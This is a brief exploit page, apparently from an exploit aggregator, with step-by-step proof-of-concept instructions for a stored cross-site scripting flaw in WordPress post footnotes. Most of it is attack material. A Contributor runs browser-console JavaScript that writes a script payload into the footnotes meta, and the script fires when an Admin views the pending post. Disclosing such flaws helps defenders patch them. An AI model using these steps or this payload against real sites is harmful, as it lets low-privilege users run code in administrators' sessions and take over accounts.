Share
## https://sploitus.com/exploit?id=WPEX-ID:6AD7D26D-50E5-4F6F-B2C2-61B8BC68894F
1. Create a new post as a Contributor user.
2. Add a paragraph block and add a footnote to the paragraph.
3. Open the developer console and execute the following code:

wp.data.select('core/editor').getEditedPostAttribute('meta');

You will see something like the following. Take note of the id.

{ footnotes: "[{\"content\":\"uuuuu\",\"id\":\"969d913a-9844-405e-8647-570d675fbeb6\"}]" }

4. Execute the following code on the console, using the id gathered above:

wp.data.dispatch('core/editor').editPost({meta:{...wp.data.select('core/editor').getEditedPostAttribute('meta'), footnotes:'[{\"content\":\"uuuuu<script>alert(\'ok\');</script>\",\"id\":\"969d913a-9844-405e-8647-570d675fbeb6\"}]'}});

5. As an Admin user, view the pending post at the following URL to trigger the XSS (filling in SITE_URL and POST_ID):

https://SITE_URL?id=POST_ID